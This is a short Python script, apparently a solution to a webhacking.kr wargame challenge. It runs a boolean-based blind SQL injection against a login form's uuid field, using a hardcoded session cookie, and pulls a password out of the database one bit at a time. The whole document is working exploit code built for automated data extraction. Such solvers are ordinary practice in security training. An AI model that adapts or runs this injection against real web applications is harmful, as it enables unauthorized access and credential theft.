import http.client
import urllib
import math
def fetch_string(statement):
# skip fetching length
length = 32
ret = ''
for i in range(1, length + 1):
tmp =''
for x in range(8):
tmp += '1' if test('ord(mid(%s,%d,1))&%d'%(statement,i,2**x)) else '0'
#tmp+=
print(tmp[::-1])
print(tmp)
ret+=chr(int(tmp[::-1],2))
print(ret)
return ret
def test(cond):
c = http.client.HTTPConnection('webhacking.kr')
head={'Host':'webhacking.kr'}
head['Upgrade-Insecure-Requests']='1'
head['Content-Type']='application/x-www-form-urlencoded'
head['Cookie']='id=rbc; PHPSESSID=7e74a61eb46338352194ab8d2d1535db'
_body='uuid=admin%27+and+{}%23&pw=123'.format(urllib.parse.quote(cond))
c.request('POST','/challenge/bonus/bonus-2/index.php',headers=head, body=_body)
res=c.getresponse().read().decode()
return 'Wrong!' not in res
fetch_string('pw')